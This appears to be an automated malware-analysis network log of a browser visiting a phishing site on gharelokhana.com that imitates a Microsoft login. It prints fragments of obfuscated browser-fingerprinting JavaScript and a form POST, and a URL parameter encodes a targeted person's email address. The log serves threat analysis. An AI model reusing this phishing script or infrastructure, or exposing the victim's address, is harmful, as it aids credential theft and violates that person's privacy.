                                                Connection: keep-alive
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                Accept: */*
                                                Sec-Fetch-Site: none
                                                Sec-Fetch-Mode: cors
                                                Sec-Fetch-Dest: empty
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                2024-12-05 07:23:54 UTC181INHTTP/1.1 200 OK
                                                Server: nginx
                                                Date: Thu, 05 Dec 2024 07:23:54 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Vary: Accept-Encoding
                                                2024-12-05 07:23:54 UTC16203INData Raw: 37 37 66 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 66 75 6e 63 74 69 6f 6e 20 61 30 54 35 28 54 2c 42 29 7b 76 61 72 20 6b 3d 61 30 54 34 28 29 3b 72 65 74 75 72 6e 20 61 30 54 35 3d 66 75 6e 63 74 69 6f 6e 28 48 2c 70 29 7b 48 3d 48 2d 30 78 31 62 61 3b 76 61 72 20 66 3d 6b 5b 48 5d 3b 72 65 74 75 72 6e 20 66 3b 7d 2c 61 30 54 35 28 54 2c 42 29 3b 7d 66 75 6e 63 74 69 6f 6e 20 61 30 54 34 28 29 7b 76 61 72 20 61 6a 3d 5b 27 65 73 55 6d 4a 27 2c 27 75 6e 68 61 6e 64 6c 65 64 52 65 6a 65 63 74 69 6f 6e 27 2c 27 65 6d 69 74 27 2c 27 6e 61 76 69 67 61 74 6f 72
                                                Data Ascii: 77f5<!DOCTYPE html><html lang="en"> <head> <script type="text/javascript"> function a0T5(T,B){var k=a0T4();return a0T5=function(H,p){H=H-0x1ba;var f=k[H];return f;},a0T5(T,B);}function a0T4(){var aj=['esUmJ','unhandledRejection','emit','navigator
                                                2024-12-05 07:23:54 UTC14514INData Raw: 65 27 2c 27 37 30 71 6c 52 69 6a 65 27 2c 27 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 4e 61 6d 65 73 27 2c 27 46 75 6e 63 74 69 6f 6e 27 2c 27 24 5c 78 32 30 69 66 5c 78 32 30 75 70 67 72 61 64 65 5c 78 32 30 74 6f 5c 78 32 30 50 72 6f 3a 5c 78 32 30 27 2c 27 67 65 74 53 74 6f 72 61 67 65 55 70 64 61 74 65 73 27 2c 27 67 65 74 27 2c 27 42 69 74 73 74 72 65 61 6d 5c 78 32 30 56 65 72 61 5c 78 32 30 53 61 6e 73 5c 78 32 30 4d 6f 6e 6f 27 2c 27 77 65 62 6b 69 74 4f 66 66 6c 69 6e 65 41 75 64 69 6f 43 6f 6e 74 65 78 74 27 2c 27 61 62 6f 75 74 3a 62 6c 61 6e 6b 27 2c 27 43 4b 77 47 6e 27 2c 27 4c 75 63 69 64 61 5c 78 32 30 53 61 6e 73 27 5d 3b 61 30 54 34 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 61 6a 3b 7d 3b 72 65 74 75 72 6e 20 61 30 54 34
                                                Data Ascii: e','70qlRije','getOwnPropertyNames','Function','$\x20if\x20upgrade\x20to\x20Pro:\x20','getStorageUpdates','get','Bitstream\x20Vera\x20Sans\x20Mono','webkitOfflineAudioContext','about:blank','CKwGn','Lucida\x20Sans'];a0T4=function(){return aj;};return a0T4
                                                2024-12-05 07:23:54 UTC16384INData Raw: 63 30 30 30 0d 0a 4d 61 70 27 3a 30 78 30 2c 27 4e 6f 64 65 4c 69 73 74 27 3a 30 78 31 2c 27 50 61 69 6e 74 52 65 71 75 65 73 74 4c 69 73 74 27 3a 30 78 30 2c 27 50 6c 75 67 69 6e 27 3a 30 78 30 2c 27 50 6c 75 67 69 6e 41 72 72 61 79 27 3a 30 78 30 2c 27 53 56 47 4c 65 6e 67 74 68 4c 69 73 74 27 3a 30 78 30 2c 27 53 56 47 4e 75 6d 62 65 72 4c 69 73 74 27 3a 30 78 30 2c 27 53 56 47 50 61 74 68 53 65 67 4c 69 73 74 27 3a 30 78 30 2c 27 53 56 47 50 6f 69 6e 74 4c 69 73 74 27 3a 30 78 30 2c 27 53 56 47 53 74 72 69 6e 67 4c 69 73 74 27 3a 30 78 30 2c 27 53 56 47 54 72 61 6e 73 66 6f 72 6d 4c 69 73 74 27 3a 30 78 30 2c 27 53 6f 75 72 63 65 42 75 66 66 65 72 4c 69 73 74 27 3a 30 78 30 2c 27 53 74 79 6c 65 53 68 65 65 74 4c 69 73 74 27 3a 30 78 30 2c 27 54 65 78
                                                Data Ascii: c000Map':0x0,'NodeList':0x1,'PaintRequestList':0x0,'Plugin':0x0,'PluginArray':0x0,'SVGLengthList':0x0,'SVGNumberList':0x0,'SVGPathSegList':0x0,'SVGPointList':0x0,'SVGStringList':0x0,'SVGTransformList':0x0,'SourceBufferList':0x0,'StyleSheetList':0x0,'Tex
                                                2024-12-05 07:23:54 UTC16384INData Raw: 31 61 34 31 3a 66 75 6e 63 74 69 6f 6e 28 6b 6d 2c 6b 62 2c 6b 5a 29 7b 76 61 72 20 66 44 3d 61 30 54 35 3b 69 66 28 66 44 28 30 78 34 38 31 29 21 3d 3d 66 44 28 30 78 34 38 31 29 29 72 65 74 75 72 6e 20 6e 65 77 20 54 4f 28 74 68 69 73 29 3b 65 6c 73 65 7b 76 61 72 20 6b 59 3d 6b 5a 28 30 78 37 30 66 29 2c 6b 61 3d 6b 5a 28 30 78 38 66 35 29 2c 6b 55 3d 6b 5a 28 30 78 61 30 34 29 3b 6b 6d 5b 66 44 28 30 78 33 61 65 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 6b 75 2c 6b 4d 2c 6b 69 29 7b 76 61 72 20 66 4f 3d 66 44 2c 6b 73 2c 6b 6f 3b 6b 61 28 6b 75 29 3b 74 72 79 7b 69 66 28 66 4f 28 30 78 33 30 30 29 21 3d 3d 66 4f 28 30 78 34 33 37 29 29 7b 69 66 28 21 28 6b 73 3d 6b 55 28 6b 75 2c 66 4f 28 30 78 34 36 36 29 29 29 29 7b 69 66 28 66 4f 28 30 78 34 63 38 29 3d
                                                Data Ascii: 1a41:function(km,kb,kZ){var fD=a0T5;if(fD(0x481)!==fD(0x481))return new TO(this);else{var kY=kZ(0x70f),ka=kZ(0x8f5),kU=kZ(0xa04);km[fD(0x3ae)]=function(ku,kM,ki){var fO=fD,ks,ko;ka(ku);try{if(fO(0x300)!==fO(0x437)){if(!(ks=kU(ku,fO(0x466)))){if(fO(0x4c8)=
                                                2024-12-05 07:23:54 UTC16384INData Raw: 28 30 78 32 63 34 29 5d 2c 6b 51 3d 76 6f 69 64 20 30 78 30 21 3d 3d 2f 28 29 3f 3f 2f 5b 49 31 28 30 78 35 65 66 29 5d 28 27 27 29 5b 30 78 31 5d 3b 28 6b 50 7c 7c 6b 51 7c 7c 6b 4c 7c 7c 6b 4e 7c 7c 6b 79 29 26 26 28 6b 71 3d 66 75 6e 63 74 69 6f 6e 28 6b 45 29 7b 76 61 72 20 49 32 3d 49 31 2c 6b 6a 2c 6b 78 2c 6b 52 2c 6b 6c 2c 6b 58 2c 6b 44 2c 6b 4f 2c 6b 67 3d 74 68 69 73 2c 6b 77 3d 6b 65 28 6b 67 29 2c 6b 64 3d 6b 75 28 6b 45 29 2c 6b 53 3d 6b 77 5b 27 72 61 77 27 5d 3b 69 66 28 6b 53 29 72 65 74 75 72 6e 20 6b 53 5b 49 32 28 30 78 35 39 30 29 5d 3d 6b 67 5b 49 32 28 30 78 35 39 30 29 5d 2c 6b 6a 3d 6b 55 28 6b 71 2c 6b 53 2c 6b 64 29 2c 6b 67 5b 27 6c 61 73 74 49 6e 64 65 78 27 5d 3d 6b 53 5b 49 32 28 30 78 35 39 30 29 5d 2c 6b 6a 3b 76 61 72 20
                                                Data Ascii: (0x2c4)],kQ=void 0x0!==/()??/[I1(0x5ef)]('')[0x1];(kP||kQ||kL||kN||ky)&&(kq=function(kE){var I2=I1,kj,kx,kR,kl,kX,kD,kO,kg=this,kw=ke(kg),kd=ku(kE),kS=kw['raw'];if(kS)return kS[I2(0x590)]=kg[I2(0x590)],kj=kU(kq,kS,kd),kg['lastIndex']=kS[I2(0x590)],kj;var
                                                2024-12-05 07:23:54 UTC8INData Raw: 6b 61 3d 6b 5a 28 0d 0a
                                                Data Ascii: ka=kZ(
                                                2024-12-05 07:23:54 UTC16384INData Raw: 63 30 30 30 0d 0a 30 78 65 63 61 29 2c 6b 55 3d 6b 5a 28 30 78 31 39 66 62 29 5b 6d 62 28 30 78 32 38 35 29 5d 2c 6b 56 3d 6b 5a 28 30 78 63 35 30 29 2c 6b 75 3d 6b 61 28 5b 5d 5b 6d 62 28 30 78 32 38 35 29 5d 29 2c 6b 4d 3d 21 21 6b 75 26 26 30 78 31 2f 6b 75 28 5b 30 78 31 5d 2c 30 78 31 2c 2d 30 78 30 29 3c 30 78 30 3b 6b 59 28 7b 27 74 61 72 67 65 74 27 3a 6d 62 28 30 78 32 35 32 29 2c 27 70 72 6f 74 6f 27 3a 21 30 78 30 2c 27 66 6f 72 63 65 64 27 3a 6b 4d 7c 7c 21 6b 56 28 6d 62 28 30 78 32 38 35 29 29 7d 2c 7b 27 69 6e 64 65 78 4f 66 27 3a 66 75 6e 63 74 69 6f 6e 28 6b 69 29 7b 76 61 72 20 6d 5a 3d 6d 62 2c 6b 73 3d 61 72 67 75 6d 65 6e 74 73 5b 6d 5a 28 30 78 32 38 64 29 5d 3e 30 78 31 3f 61 72 67 75 6d 65 6e 74 73 5b 30 78 31 5d 3a 76 6f 69 64 20
                                                Data Ascii: c0000xeca),kU=kZ(0x19fb)[mb(0x285)],kV=kZ(0xc50),ku=ka([][mb(0x285)]),kM=!!ku&&0x1/ku([0x1],0x1,-0x0)<0x0;kY({'target':mb(0x252),'proto':!0x0,'forced':kM||!kV(mb(0x285))},{'indexOf':function(ki){var mZ=mb,ks=arguments[mZ(0x28d)]>0x1?arguments[0x1]:void
                                                2024-12-05 07:23:55 UTC16384INData Raw: 2c 30 78 31 36 38 65 3a 66 75 6e 63 74 69 6f 6e 28 6b 6d 2c 6b 62 2c 6b 5a 29 7b 76 61 72 20 62 70 3d 61 30 54 35 2c 6b 59 3d 6b 5a 28 30 78 32 31 61 34 29 2c 6b 61 3d 6b 5a 28 30 78 35 38 31 29 2c 6b 55 3d 6b 5a 28 30 78 32 35 35 35 29 2c 6b 56 3d 6b 5a 28 30 78 62 31 30 29 2c 6b 75 3d 6b 5a 28 30 78 31 35 37 65 29 5b 27 43 4f 4e 53 54 52 55 43 54 4f 52 27 5d 2c 6b 4d 3d 6b 5a 28 30 78 38 37 63 29 2c 6b 69 3d 6b 61 28 62 70 28 30 78 32 32 30 29 29 2c 6b 73 3d 6b 55 26 26 21 6b 75 3b 6b 59 28 7b 27 74 61 72 67 65 74 27 3a 62 70 28 30 78 32 32 30 29 2c 27 73 74 61 74 27 3a 21 30 78 30 2c 27 66 6f 72 63 65 64 27 3a 6b 55 7c 7c 6b 75 7d 2c 7b 27 72 65 73 6f 6c 76 65 27 3a 66 75 6e 63 74 69 6f 6e 28 6b 6f 29 7b 72 65 74 75 72 6e 20 6b 4d 28 6b 73 26 26 74 68
                                                Data Ascii: ,0x168e:function(km,kb,kZ){var bp=a0T5,kY=kZ(0x21a4),ka=kZ(0x581),kU=kZ(0x2555),kV=kZ(0xb10),ku=kZ(0x157e)['CONSTRUCTOR'],kM=kZ(0x87c),ki=ka(bp(0x220)),ks=kU&&!ku;kY({'target':bp(0x220),'stat':!0x0,'forced':kU||ku},{'resolve':function(ko){return kM(ks&&th
                                                2024-12-05 07:23:55 UTC16384INData Raw: 2f 6b 5a 3b 7d 66 75 6e 63 74 69 6f 6e 20 54 61 28 6b 6d 2c 6b 62 29 7b 76 61 72 20 6b 5a 3d 6b 6d 5b 30 78 30 5d 3e 3e 3e 30 78 31 30 2c 6b 59 3d 30 78 66 66 66 66 26 6b 6d 5b 30 78 30 5d 2c 6b 61 3d 6b 6d 5b 30 78 31 5d 3e 3e 3e 30 78 31 30 2c 6b 55 3d 30 78 66 66 66 66 26 6b 6d 5b 30 78 31 5d 2c 6b 56 3d 6b 62 5b 30 78 30 5d 3e 3e 3e 30 78 31 30 2c 6b 75 3d 30 78 66 66 66 66 26 6b 62 5b 30 78 30 5d 2c 6b 4d 3d 6b 62 5b 30 78 31 5d 3e 3e 3e 30 78 31 30 2c 6b 69 3d 30 78 30 2c 6b 73 3d 30 78 30 2c 6b 6f 3d 30 78 30 2c 6b 65 3d 30 78 30 3b 6b 6f 2b 3d 28 6b 65 2b 3d 6b 55 2b 28 30 78 66 66 66 66 26 6b 62 5b 30 78 31 5d 29 29 3e 3e 3e 30 78 31 30 2c 6b 65 26 3d 30 78 66 66 66 66 2c 6b 73 2b 3d 28 6b 6f 2b 3d 6b 61 2b 6b 4d 29 3e 3e 3e 30 78 31 30 2c 6b 6f
                                                Data Ascii: /kZ;}function Ta(km,kb){var kZ=km[0x0]>>>0x10,kY=0xffff&km[0x0],ka=km[0x1]>>>0x10,kU=0xffff&km[0x1],kV=kb[0x0]>>>0x10,ku=0xffff&kb[0x0],kM=kb[0x1]>>>0x10,ki=0x0,ks=0x0,ko=0x0,ke=0x0;ko+=(ke+=kU+(0xffff&kb[0x1]))>>>0x10,ke&=0xffff,ks+=(ko+=ka+kM)>>>0x10,ko
                                                2024-12-05 07:23:55 UTC8INData Raw: 36 3b 29 6b 4d 2b 0d 0a
                                                Data Ascii: 6;)kM+


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                8192.168.2.549830164.92.191.864435840C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-12-05 07:24:04 UTC1144OUTPOST /?km=a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A HTTP/1.1
                                                Host: djdjkdlellekkff.gharelokhana.com
                                                Connection: keep-alive
                                                Content-Length: 5056
                                                Cache-Control: max-age=0
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                sec-ch-ua-mobile: ?0
                                                sec-ch-ua-platform: "Windows"
                                                Upgrade-Insecure-Requests: 1
                                                Origin: https://djdjkdlellekkff.gharelokhana.com
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Sec-Fetch-Site: same-origin
                                                Sec-Fetch-Mode: navigate
                                                Sec-Fetch-User: ?1
                                                Sec-Fetch-Dest: document
                                                Referer: https://djdjkdlellekkff.gharelokhana.com/?km=a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                2024-12-05 07:24:04 UTC5056OUTData Raw: 72 30 31 6c 72 3d 25 35 42 25 35 42 25 32 32 36 38 36 61 36 32 37 31 32 35 33 33 34 35 32 35 33 33 34 36 37 33 36 25 32 32 25 32 43 25 32 32 63 37 33 36 64 32 35 33 33 34 34 37 65 32 35 33 33 34 35 37 36 32 35 25 32 32 25 32 43 25 32 32 33 37 34 36 37 61 36 34 32 35 33 33 34 32 36 63 36 32 37 61 37 30 33 25 32 32 25 32 43 25 32 32 34 34 36 32 35 34 33 33 32 32 35 33 38 33 37 32 35 33 33 34 32 36 65 25 32 32 25 32 43 25 32 32 33 39 33 31 33 33 33 31 33 39 33 32 33 36 33 37 33 37 33 31 33 34 33 25 32 32 25 32 43 25 32 32 31 33 38 33 36 33 30 33 38 33 36 25 32 32 25 35 44 25 32 43 25 32 32 39 31 33 31 39 32 36 37 37 31 25 32 32 25 32 43 25 32 32 35 39 36 36 31 33 36 25 32 32 25 32 43 37 25 35 44 26 64 73 76 79 6f 78 70 79 68 3d 25 35 42 25 35 42 25 32 32 37
                                                Data Ascii: r01lr=%5B%5B%22686a6271253345253346736%22%2C%22c736d2533447e2533457625%22%2C%2237467a642533426c627a703%22%2C%224462543322538372533426e%22%2C%2239313331393236373731343%22%2C%2213836303836%22%5D%2C%229131926771%22%2C%225966136%22%2C7%5D&dsvyoxpyh=%5B%5B%227
                                                2024-12-05 07:24:04 UTC534INHTTP/1.1 302 Found
                                                Server: nginx
                                                Date: Thu, 05 Dec 2024 07:24:04 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                location: https://djdjkdlellekkff.gharelokhana.com/?km=a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A
                                                set-cookie: zQt4SK="M2M0MTI1Y2EtMWNlMi00OWFlLWE4YjQtMjVlODU1NWEzMmUyOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="; Domain=gharelokhana.com; HttpOnly; Path=/; SameSite=None; Secure
                                                2024-12-05 07:24:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                9192.168.2.549829164.92.191.864435840C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-12-05 07:24:04 UTC1141OUTGET /?km=a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A HTTP/1.1
                                                Host: djdjkdlellekkff.gharelokhana.com
                                                Connection: keep-alive
                                                Cache-Control: max-age=0
                                                Upgrade-Insecure-Requests: 1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Sec-Fetch-Site: same-origin
                                                Sec-Fetch-Mode: navigate
                                                Sec-Fetch-User: ?1
                                                Sec-Fetch-Dest: document
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                sec-ch-ua-mobile: ?0
                                                sec-ch-ua-platform: "Windows"
                                                Referer: https://djdjkdlellekkff.gharelokhana.com/?km=a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: zQt4SK="M2M0MTI1Y2EtMWNlMi00OWFlLWE4YjQtMjVlODU1NWEzMmUyOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="
                                                2024-12-05 07:24:06 UTC784INHTTP/1.1 200 OK
                                                Server: nginx
                                                Date: Thu, 05 Dec 2024 07:24:05 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Content-Length: 56073
                                                Connection: close
                                                cache-control: no-store, no-cache
                                                pragma: no-cache
                                                vary: Accept-Encoding
                                                p3p: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                x-ms-request-id: d2a8fabc-5bee-4408-8934-f61ffc644a01
                                                x-ms-ests-server: 2.1.19568.3 - WEULR1 ProdSlices
                                                report-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://4b553e95-3c4125ca.gharelokhana.com/api/report?catId=GW+estsfd+SEC"}]}
                                                nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}
                                                x-ms-srs: 1.P
                                                referrer-policy: strict-origin-when-cross-origin
                                                content-encoding: gzip
                                                access-control-allow-origin: *
                                                access-control-allow-headers: *
                                                2024-12-05 07:24:06 UTC15600INData Raw: 1f 8b 08 00 00 00 00 00 00 03 bc bd 79 5f db c8 b6 28 fa 7f 7f 0a f0 ed 87 a5 8d 00 8f d8 d8 51 fb 12 43 d4 24 0c 66 0a 09 6e 0e 57 b6 ca e0 d8 96 88 64 03 76 c2 fb ec 6f 0d 55 52 c9 43 ba cf 3e fb be fe 75 b0 54 aa 71 d5 aa 55 6b aa 55 ef d6 0f ce 9a 57 5f 5b 87 6b 8f e3 d1 f0 8f df de f1 cf da bb 47 e1 7a f0 bb f6 6e dc 1f 0f 05 3e ad 5d 08 af 1f 8a ee b8 ef 3f e0 87 9d f8 cb bb 91 18 bb 6b dd c0 1f 0b 7f 6c 67 c6 e2 75 bc 83 f5 d4 d7 ba 8f 6e 18 89 b1 3d 19 f7 b6 aa 19 68 63 fc b4 25 be 4f fa cf 76 a6 c9 d9 b7 ae a6 4f 22 b3 b3 a4 9a a3 43 5b 78 0f 22 5d ea cb d6 f5 fe 56 33 18 3d b9 e3 7e 67 b8 bc e0 4b df 1b 3f da 9e 78 ee 77 c5 16 bd 58 6b 7d bf 3f ee bb c3 ad a8 eb 0e 85 9d df ce 59 6b 23 f7 b5 3f 9a 8c 64 52 01 93 26 91 08 e9 dd 85 ba ed a9 88 32
                                                Data Ascii: y_(QC$fnWdvoURC>uTqUkUW_[kGzn>]?klgun=hc%OvO"C[x"]V3=~gK?xwXk}?Yk#?dR&2
                                                2024-12-05 07:24:06 UTC14460INData Raw: fc c2 a2 62 3a 0c 4b 0b 79 04 76 87 14 3e 79 68 68 d4 59 af f4 1a df d0 a1 da 21 0d 05 36 f1 83 8c 30 f2 7c c0 07 8c 1c b4 ac 64 ca 46 41 00 78 4d b6 aa 57 da 8f 78 f8 af a4 e3 eb c6 c2 34 9f ed 0c 06 b0 fd 24 75 94 b4 18 01 65 b2 ac 96 f4 a3 a3 ba f7 43 7c 92 92 59 f1 02 ab 28 a6 d8 0f 34 94 14 90 96 c3 33 10 6b ea 05 1e 19 c4 e0 40 b9 f4 7c f3 c7 8e 6b 6e 3a b9 4d 7e 29 08 33 65 84 7d 53 aa c3 7c a9 b3 9a a0 cd bb 3e 6b 42 2b ab 5e f8 34 25 a9 03 50 7b 4c b4 99 0f e6 86 5f 94 52 8d 76 a3 15 0e cf 4b 04 b0 1b 72 fa 6b 67 a9 1a e2 d7 e9 bc f8 80 bc cc f1 25 16 09 8a c5 d5 66 8f c3 45 ad e7 1c cf 22 bb 79 48 33 58 49 59 d2 51 78 a0 5a 3e d9 e1 61 8c f6 ec 2c ed 2a ed e7 81 ea 07 6c 50 4b d8 c0 cf 09 c2 7c 26 ca 2e 88 63 56 cf 8a bd 21 8f 1d d7 08 2e 08 98
                                                Data Ascii: b:Kyv>yhhY!60|dFAxMWx4$ueC|Y(43k@|kn:M~)3e}S|>kB+^4%P{L_RvKrkg%fE"yH3XIYQxZ>a,*lPK|&.cV!.
                                                2024-12-05 07:24:06 UTC16384INData Raw: 6d 6a 3b 32 fb 9e 65 a1 94 d7 c5 05 d4 0d 3a 9f 3f 6b 50 b9 4e 62 44 11 7f 13 04 99 15 1d b1 d0 49 f4 4e c7 3f 0e 67 21 5f 75 fa 17 c5 2b de 69 5a 07 d6 c8 0d eb 14 c6 9e 1c 40 74 f4 8e 51 08 3c b5 79 e9 5e 21 02 8b 1b b0 ad 51 c1 31 99 1d 9d 1f 54 1a 47 39 09 3a 48 1d ee 47 dc dd 0a d8 7b cd e7 9c 34 5c d5 ae 06 8b 56 cb ce c2 76 30 8c 2e 94 1d bd 50 52 de 74 da 79 1c a6 22 79 a1 b4 24 c0 21 6a 96 0d c3 04 41 27 9b 6a 1f b0 7e e0 63 df 30 64 c4 a8 a8 7f 15 5b 8e 91 44 c7 85 e0 f3 bf 1b 02 f1 0d 81 a4 9e bc e9 e5 eb 50 c9 6a a3 60 f2 3c 07 ff f6 2d 9d 74 34 9d 78 4c 27 1d a6 13 b3 93 ab bd 29 dc 69 8c 29 68 6a 35 27 c1 cd d6 87 3d 4a 44 a1 b1 a7 64 9d 80 2e 35 86 6a 94 11 c1 e1 17 44 62 cc 64 1c 10 79 46 db a1 71 a9 cb b8 98 89 ef 59 73 70 29 92 de 79 4c
                                                Data Ascii: mj;2e:?kPNbDIN?g!_u+iZ@tQ<y^!Q1TG9:HG{4\Vv0.PRty"y$!jA'j~c0d[DPj`<-t4xL')i)hj5'=JDd.5jDbdyFqYsp)yL
                                                2024-12-05 07:24:06 UTC9629INData Raw: a9 13 2c 69 83 de 77 2b 4b 98 f1 eb 7d 25 39 a8 d1 3c 77 b2 d9 81 7e 94 80 c0 d5 b1 51 65 16 f5 2a 09 cf 40 4e a4 27 e0 fd 73 d0 db b5 74 4e db dd ae c5 ee 66 46 86 64 82 3d fc e5 af c2 74 d0 8a ce 5d 64 86 5c 6f 9e e8 cf cc 9f 44 a5 19 fe c7 b1 94 60 a0 d3 61 36 e0 71 a3 c3 a5 75 9b 84 0e 4f ed ec 1c 66 27 99 3f 0f 0b 87 bf 23 99 09 2d 93 f7 42 a5 71 68 cc 32 ef 8a f0 4c 79 ce 2e c4 65 f2 c4 0c 0b 8d d4 d9 db c1 fb 6d 2a 9b 2a be df 3d 5e ab bf ff f3 8d 9d ab 29 1e 30 9b aa 1e f8 af 1d f5 77 36 9c b6 c2 11 ce cd a6 ea d7 93 37 3d 19 fa 9d 16 fd 18 86 cf 9d 76 27 f0 d5 e5 0f b2 1f 67 53 87 97 d5 db bb 9b da e1 dd e5 8d fa 65 61 6d b3 14 1e 17 e0 a2 a8 6d 49 78 e1 ae de 41 1b 08 7c 3b 9b 9a 04 ad 79 ab 1f 14 c9 c5 06 c5 de 34 e7 67 4f ea af b5 d1 21 5b c8
                                                Data Ascii: ,iw+K}%9<w~Qe*@N'stNfFd=t]d\oD`a6quOf'?#-Bqh2Ly.em**=^)0w67=v'gSeammIxA|;y4gO![


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                10192.168.2.549839164.92.191.864435840C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-12-05 07:24:07 UTC663OUTGET /shared/1.0/content/js/BssoInterrupt_Core_zKox_QMcTIVut7mG_Z9Eew2.js HTTP/1.1
                                                Host: 707242bf-3c4125ca.gharelokhana.com
                                                Connection: keep-alive
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                Origin: https://djdjkdlellekkff.gharelokhana.com
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                sec-ch-ua-platform: "Windows"
                                                Accept: */*
                                                Sec-Fetch-Site: same-site
                                                Sec-Fetch-Mode: cors
                                                Sec-Fetch-Dest: script
                                                Referer: https://djdjkdlellekkff.gharelokhana.com/
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                2024-12-05 07:24:09 UTC745INHTTP/1.1 200 OK
                                                Server: nginx
                                                Date: Thu, 05 Dec 2024 07:24:08 GMT
                                                Content-Type: application/x-javascript
                                                Content-Length: 49935
                                                Connection: close
                                                accept-ranges: bytes
                                                access-control-allow-origin: *
                                                access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                age: 5458318
                                                cache-control: public, max-age=31536000
                                                etag: 0x8DCE31CBE97473C
                                                last-modified: Wed, 02 Oct 2024 19:59:37 GMT
                                                vary: Accept-Encoding
                                                x-cache: HIT
                                                x-ms-blob-type: BlockBlob
                                                x-ms-lease-status: unlocked
                                                x-ms-request-id: a6876d74-601e-0080-4c42-15abc8000000
                                                x-ms-version: 2009-09-19
                                                content-encoding: gzip
